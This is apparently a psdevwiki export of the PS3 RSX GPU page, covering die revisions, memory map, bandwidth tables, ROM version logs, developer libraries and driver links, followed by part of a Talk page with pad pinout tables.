&lt;gallery&gt;<br /> File:PS3 - RSX - 40nm 65nm 90nm - die sizes.jpg|[[RSX]] die sizes, left to right: 40nm 65nm 90nm<br /> &lt;/gallery&gt;<br /> <br /> The following is a small sample of serial numbers of the RSX by model number.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! PS3 Model !! Mobo Model !! Mobo serial !! RSX Serial !! Die Tech !! Die Size !! Remark<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971GB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-12 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHAxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-22 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHBxx]] || [[COK-00x#COK-001|COK-001]] || 1-871-868-32 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-11 || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-21 || [[CXD2971GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHCxx]] || [[COK-00x#COK-002|COK-002]] || 1-873-513-31 || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHDxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHExx]] || [[COK-00x#COK-002W|COK-002W]] || 1-873-513-xx || -? || 90nm || 258mm² || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHFxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971BGB]]&lt;br /&gt;&amp;nbsp;&amp;nbsp;or:&lt;br /&gt;[[CXD2971DGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHGxx]] || [[SEM-00x|SEM-001]] || 1-875-384-xx || [[CXD2971DGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-938-31 || [[CXD2971-1GB]] || 90nm || 258mm² || -<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971-1GB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHHxx]] || [[DIA-00x#DIA-001|DIA-001]] || 1-875-368-11 || [[CXD2971AGB]] || 90nm || 258mm² || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHIxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHJxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-32 || [[CXD2982BGB]] || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-42 || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHKxx]] || [[DIA-00x#DIA-002|DIA-002]] || 1-876-912-xx || [[CXD2982GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECHLxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || [[CXD2991GB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECHMxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHNxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;[[CECHOxx]]&lt;/span&gt; || colspan=&quot;6&quot; style=&quot;text-align:center; background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;SKU never released&lt;/span&gt;<br /> |-<br /> | [[CECHPxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECHQxx]] || [[VER-00x|VER-001]] || 1-878-196-31 || -? || 65nm || ? 186mm² ? || -<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991CGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991EGB]] || 65nm || ? 186mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-20xx]] || [[DYN-00x|DYN-001]] || 1-880-055-31 || [[CXD2991GGB]] || 65nm || ? 186mm² ? ||<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://reballing.es/viewtopic.php?f=13&amp;t=2131 reballing.es]<br /> |-<br /> | [[CECH-21xx]] || [[SUR-00x|SUR-001]] || 1-881-945-11 || [[CXD5300AGB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-25xx]] || [[JTP-00x|JTP-001]] || 1-882-481-21 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? ||<br /> |-<br /> | [[CECH-25xx]] || [[JSD-00x|JSD-001]] || 1-882-770-11 || [[CXD5300A1GB]] || 40nm || ? 114mm² ? || [http://www.edepot.com/playstation3.html#PS3_RSX_GPU edepot ps3secrets]<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-11 || [[CXD5301DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-30xx]] || [[KTE-00x|KTE-001]] || 1-884-749-31 || [[CXD5301A1GB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MSX-00x|MSX-001]] || 1-886-928-11 || [[CXD5302DGB]] || 40nm || ? 114mm² ? || -<br /> |-<br /> | [[CECH-40xx]] || [[MPX-00x|MPX-001]] || 1-887-233-11 || [[CXD5302A1GB]] || 40nm || ? 114mm² ? || - [http://pocketnews.cocolog-nifty.com/pkns/2012/10/ps3-cech-4000-e.html pocketnews dissasembly]<br /> |-<br /> |}<br /> Other unspecified: [[CXD297BGB]] and [[CXD2971-1GB]] (CECHA&lt;!--//Pereb//--&gt; refurbished? note:lowest FW was 2.30)<br /> ===Alternative list===<br /> * [[CECHAxx]]/[[COK-00x#COK-001|COK-001]], [[CECHBxx]]/[[COK-00x#COK-001|COK-001]], [[CECHCxx]]/[[COK-00x#COK-002|COK-002]], [[CECHExx]]/[[COK-00x#COK-002W|COK-002W]] and [[CECHHxx]]/[[DIA-00x#DIA-001|DIA-001]] : [[CXD2971AGB]] (RSX 90nm)<br /> * [[CECHGxx]]/[[SEM-00x|SEM-001]] : [[CXD2971DGB]] (RSX 90nm)<br /> * [[CECHJxx]]/[[DIA-00x#DIA-002|DIA-002]] and [[CECHKxx]]/[[DIA-00x#DIA-002|DIA-002]] : [[CXD2982]] (RSX 65nm)<br /> * [[CECHLxx]]/[[VER-00x|VER-001]] up to including [[CECHQxx]]/[[VER-00x|VER-001]] : [[CXD2991BGB]] (RSX 65nm)<br /> * [[CECH-20xx]]/[[DYN-00x|DYN-001]] : [[CXD2991GGB]] (RSX 65nm)<br /> * [[CECH-21xx]]/[[SUR-00x|SUR-001]] : [[CXD5300AGB]] (RSX 40nm)<br /> * [[CECH-25xx]]/[[JTP-00x|JTP-001]] and [[CECH-25xx]]/[[JSD-00x|JSD-001]]: [[CXD5300A1GB]] (RSX 40nm)<br /> * [[CECH-30xx]]/[[KTE-00x|KTE-001]] : [[CXD5301DGB]] (RSX 40nm)<br /> &lt;br /&gt;<br /> <br /> == Local GDDR3 Memory Physical Structure==<br /> * Total Memory 256MB<br /> * 2 Partitions (128MB)<br /> * 64bit bus per partition<br /> * 8 Banks per partition (16MB)<br /> * 4096 Pages per bank (4KB) -&gt; 12bit Row Address<br /> * Memory block in a page -&gt; 9bit Column Address<br /> * Minimum access granularity = 8 bytes -&gt; same as buswidth between RSX &lt;&gt; GDDR<br /> <br /> =Software=<br /> <br /> == RSX Memorymap ==<br /> <br /> Although the RSX has 256MB of GDDR3 RAM, not all of it is useable. The last 4MB is reserved for keeping track of the RSX internal state and issued commands. The 4MB of GPU Data contains RAMIN, RAMHT, RAMFC, DMA Objects, Graphic Objects, and the Graphic Context. The following is a breakdown of the address within 256MB of the RSX.<br /> <br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Address Range !! Size !! Comment<br /> |-<br /> | 0000000-FBFFFFF || 252 MB || Framebuffer<br /> |-<br /> | FC00000-FFFFFFF || 4 MB || GPU Data<br /> |-<br /> | FF80000-FFFFFFF || 512KB || RAMIN: Instance Memory<br /> |-<br /> | FF90000-FF93FFF || 16KB || RAMHT: Hash Table<br /> |-<br /> | FFA0000-FFA0FFF || 4KB || RAMFC: FIFO Context<br /> |-<br /> | FFC0000-FFCFFFF || 64KB || DMA Objects<br /> |-<br /> | FFD0000-FFDFFFF || 64KB || Graphic Objects<br /> |-<br /> | FFE0000-FFFFFFF || 128KB || GRAPH: Graphic Context<br /> |-<br /> |}<br /> <br /> Besides local GDDR3 memory, main XDR memory can be accessed by RSX too, which is limited to either:<br /> * 0MB - 256MB (0x00000000 - 0x0FFFFFFF)<br /> ::-or-<br /> * 0MB - 512MB (0x00000000 - 0x1FFFFFFF)<br /> <br /> ==Speed, Bandwidth, and Latency==<br /> <br /> System bandwith (theoretical maximum):<br /> *Cell to/from 256MB XDR : 25.6 GB/s<br /> *Cell to RSX (IOIFO): 20GB/s (practical : 15.8GB/s @ packetsize 128B)<br /> *Cell from RSX (IOIFI) : 15GB/s (practical : 11.9GB/s @ packetsize 128B)<br /> *RSX to/from 256MB GDDR3 : 20.8GB/s (@ 650MHz)<br /> <br /> Because of the aforementioned layout of the communication path between the different chips, and the latency and bandwidth differences between the various components, there are different access speeds depending on the direction of the access in relation to the source and destination. The following is a chart showing the speed of reads and writes to the GDDR3 and XDR memory from the viewpoint of the Cell and RSX. Note that these are measured speeds (rather than calculated speeds) and they should be worse if RSX and GDDR3 access are involved because these figures were measured when the RSX was clocked at 550Mhz and the GDDR3 memory was clocked at 700Mhz. The shipped PS3 has the RSX clocked in at 500Mhz (front and back end, although the pixel shaders run separately inside at 550Mhz). In addition, the GDDR3 memory was also clocked lower at 650Mhz.<br /> <br /> === speed table ===<br /> {|class=&quot;wikitable&quot;<br /> |-<br /> ! Processor !! 256MB XDR !! 256MB GDDR3<br /> |-<br /> | Cell Read || 16.8GB/s || 16MB/s (15.6MB/s @ 650MHz)<br /> |-<br /> | Cell Write || 24.9GB/s || 4GB/s<br /> |-<br /> | RSX Read || 15.5GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> | RSX Write || 10.6GB/s || 22.4GB/s (20.8GB/s @ 650MHz)<br /> |-<br /> |}<br /> <br /> Because of the VERY slow Cell Read speed from the 256MB GDDR3 memory, it is more efficient for the Cell to work in XDR and then have the RSX pull data from XDR and write to GDDR3 for output to the HDMI display. This is why extra texture lookup instructions were included in the RSX to allow loading data from XDR memory (as opposed to the local GDDR3 memory).<br /> <br /> == ROM Versions ==<br /> <br /> These are the listed RSX ROM (aka Vbios) versions info we have collected from lv1 debug ouput<br /> <br /> DEH/DECR-1000:<br /> <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a01 420/600 vpe:ff shd:3f [AE0000915:0:1:16:b:f:1:1:1]<br /> <br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: a02 420/600 vpe:ff shd:3f [F9A458700:0:2:3:b:f:3:1:1][0:0:0:0:0:3]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:5f [AE0000993:0:1:13:c:a:1:4:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/600 vpe:ff shd:77 [FCA684200:0:2:2:f:7:3:5:1][0:0:0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b01 500/650 vpe:ff shd:7d [G1A778601:1:2:15:7:10:3:7:2][16:3:0:0:1:3:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b02 500/650 vpe:ff shd:3f [G2A874100:1:2:e:4:6:3:9:2][16:3:0:0:1:2:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:17:f:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b03 500/650 vpe:ff shd:7b [GAB886100:1:2:4:7:5:3:f:2][16:3:0:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E106900:1:2:c:b:6:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E107200:1:2:a:6:3:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> <br /> [INFO]: BE:3.1, SB:DX3.2<br /> rsx: b07 500/650 vpe:ff shd:3f [J3E078500:1:2:11:c:f:3:12:1][16:3:2:0:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> DECR-1400: <br /> &lt;pre&gt;<br /> rsx: rsx65 a06 500/650 vpe:ff shd:6f [AP0013056:1:1:f:13:11:2:5:2][1c:0:2:0:1:2:0][2:1:0]<br /> &lt;/pre&gt;<br /> <br /> DECHA00A: <br /> &lt;pre&gt;<br /> rsx: b08 500/650 vpe:ff shd:3f [AP0008286:1:1:14:e:b:2:11:1][39:2:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> RETAIL: <br /> &lt;pre&gt;<br /> [INFO]: BE:3.1, SB:DX3.1<br /> rsx: b08 1f4/28a vpe:ff shd:3f [AP0004687:1:1:14:13:a:2:f:1][16:3:1:1:1:3:1][0:0:0]<br /> &lt;/pre&gt;<br /> <br /> Speculatively it is likely that the very first numbers are the actual rom version (a01, b01, b03, b07, b08...) despite Sony's documentation claiming otherwise, DECR-1000 units with rom version b07 and above (and perhaps some others that have not yet been encountered) are not capable of running any firmware lower than 1.60 (from sdk 160.008) this is because the rom version is unknown/unsupported in older lv1 which will fail to initialize the RSX hardware and will cause lv1 to output a &quot;rsx rom abort!&quot; message, this will in turn create an exception early in lv2 boot process as it tries to use the RSX and creates a hard brick several RSX related errors such as &quot;lv2(2): # __rsxaudio_intr_create_thread 983 ffffffff&quot; or &quot;graphics error 512 : 00012625 c221bbb0&quot; ; &quot;lv2(2): page fault handler (DSI): invalid access address 0x795d00e8!&quot;. <br /> <br /> There is nothing in the documentation warning you about this and there is nothing preventing you (or a legitimate developer) to install an unsupported firmware as the vsh allows updating/downgrading to 1.00 or higher and the min praxis for those units is actually lower than 1.00. (0.08 to be exact)<br /> Should this issue occur to you, other than sending the unit back to Sony for servicing, the only way to fix this is to flash an ebootrom (as lv0 still runs fine and is in charge of handling flashing the system memory through lcnslsrv) the problem with that is that sony never released/issued an ebootrom for a firmware higher than 1.00.002 , so officially one would have no choice but to return the unit, that said, considering the ebootrom format is not rocket science and is actually documented (it's a very slight variation of the coreos package format, there are no specific checks whatsoever preventing you from crafting your own, it is not hashed, nor encrypted), you could (as we did) convert the PUP file of a higher firmware and flash it onto the unit to get a full recovery.<br /> <br /> == RSX Libraries ==<br /> The RSX is dedicated to 3D graphics, and developers are able to use different API libraries to access its features. The easiest way is to use high level PSGL, which is basicially OpenGL|ES with programmable pipeline added in - but hardly anyone uses PSGL these days, preferring to use the native GPU command buffer generation library, libgcm.<br /> At a lower level developers can use LibGCM, which is an API that talks to the RSX at a lower level. PSGL is actually implemented on top of LibGCM. For the advanced programmer, you can program the RSX by sending commands to it directly using C or assembly. This can be done by setting up commands (via FIFO Context) and DMA Objects and issuing them to the RSX via DMA calls.<br /> <br /> == Drivers (WiP/reference) ==<br /> <br /> * [http://mandos.homelinux.org/~glaurung/git/ps3rsx.git/ ps3rsx.git]<br /> * [http://mandos.homelinux.org/~glaurung/git/xf86-video-ps3.git/ xf86-video-ps3.git]<br /> * [http://nouveau.freedesktop.org/wiki/ nouveau wiki]<br /> * [http://psp.jim.sh/svn/listing.php?repname=ps3ware&amp;path=%2Ftrunk%2Flibps3rsx%2Fsrc%2Ffifo%2F&amp;#a408e4e3f64f03a0a91e8200a1a873401 libps3rsx]<br /> * [http://www.mesa3d.org/cell.html Mesa/Gallium Cell Driver]<br /> * git://nouveau.git.sourceforge.net/gitroot/nouveau/envytools (docs are in hwdocs, commands are in the xml's in rnndb)<br /> <br /> [[PSL1GHT]]<br /> * http://psl1ght.net/wiki/Homebrew_status<br /> * https://code.google.com/p/rsxgl/ / https://github.com/gzorin/RSXGL<br /> * https://github.com/kakaroto/e17<br /> <br /> = Other References =<br /> *&lt;strike&gt;http://7track.org/~durandal/ps3dox/&lt;/strike&gt; http://lol.notsoldierx.com/~durandal/ps3dox/ // http://173.220.0.157/~durandal/ps3dox/<br /> *http://wiki.ps2dev.org/ps3:rsx<br /> *[http://download.nvidia.com/developer/cg/Cg_1.4/1.4.1/Cg-1.4.1_UsersManual.pdf Cg Toolkit User's Manual: A Developer's Guide to Programmable Graphics, Release 1.4.1]<br /> *The Cg Tutorial (ISBN: 0321194969, Addison-Wesley, 2003)<br /> * [http://www.multiupload.com/D1XJHRH6Z9 cg-shader-tutorial.pdf (535.94 KB)] + [https://github.com/Themaister/Emulator-Shader-Pack Git: Emulator-Shader-Pack ]<br /> * http://pastie.org/private/qbpm88aml03vq8jexxvnsa PS3 RSX Glevand<br /> <br /> * Good overview of quotes of how SPU's are used together with RSX for retail games:<br /> **[http://www.neogaf.com/forum/showthread.php?p=7598043 PS3 games list &amp; SPE usages part 1]<br /> **[http://www.neogaf.com/forum/showpost.php?p=7598610&amp;postcount=32 PS3 games list &amp; SPE usages part 2]<br /> <br /> <br /> <br /> {{Motherboard Components}}&lt;noinclude&gt;[[Category:Main]]&lt;/noinclude&gt;</div> Mathieulh http://www.psdevwiki.com/ps3/index.php?title=Talk:RSX&diff=46043 Talk:RSX 2017-09-02T16:43:09Z <p>Mathieulh: /* Rom Versions */ Added some consoles of mine</p> <hr /> <div>Does anyone have any info on the supposedly broken scaler? [[User:Asdfsfs|Asdfsfs]] ([[User talk:Asdfsfs|talk]]) 00:59, 15 April 2016 (UTC)<br /> <br /> Info request:<br /> *Pad/Pinouts are unknown (just as from Cell)<br /> *Pictures of RSX and pictures of the PCB under the RSX would be nice to add.<br /> <br /> <br /> &lt;pre&gt;<br /> 1 +1.8V RSX_PLL_VDD 7 style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_PLL_VDD<br /> 2 +1.2V RSX_VDDC 6 style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDC<br /> 3 +1.2V RSX_VDDR 5 style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> 4 +1.2V YC_RC_VDDIO 4 style=&quot;color:white; background-color:#993333;&quot; | +1.2V YC_RC_VDDIO<br /> 5 +1.5V RSX_RC_VDDA 3 style=&quot;color:white; background-color:#cc3333;&quot; | +1.5V RSX_RC_VDDA <br /> 6 +1.5V RSX_VDDIO 2 style=&quot;color:white; background-color:#cc3333;&quot; | +1.5V RSX_VDDIO<br /> 7 +1.8V RSX_FBVDDQ 1 style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> <br /> Ground style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> &lt;/pre&gt;&lt;!--// embedded table cell Style used for power ^ ^ ^ //--&gt;<br /> <br /> &lt;div style=&quot;height:750px; overflow:auto&quot;&gt;<br /> {| border=&quot;1&quot; cellspacing=&quot;0&quot; cellpadding=&quot;5&quot; border=&quot;#999&quot; class=&quot;wikitable&quot; style=&quot;border:1px solid #999; border-collapse: collapse;&quot; <br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | A<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | A3 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A4 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A5 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A6 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A7 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A9 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A11 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A12 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A13 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A14 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A15 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A16 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A17 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A18 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A19 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A20 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A21 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A22 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A23 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A24 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A25 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A26 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A27 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A28 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A29 || style=&quot;color:white; background-color:#993333;&quot; | VDDR || style=&quot;color:white; background-color:#993333;&quot; | +1.2V RSX_VDDR<br /> |-<br /> | A30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | A31 || VSSMON || &amp;gt; RSX_VSSMON<br /> |-<br /> | A34 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A35 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A36 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V RSX_FBVDDQ<br /> |-<br /> | A37 || style=&quot;color:white; background-color:#ff3333;&quot; | FBVDD || style=&quot;color:white; background-color:#ff3333;&quot; | +1.8V 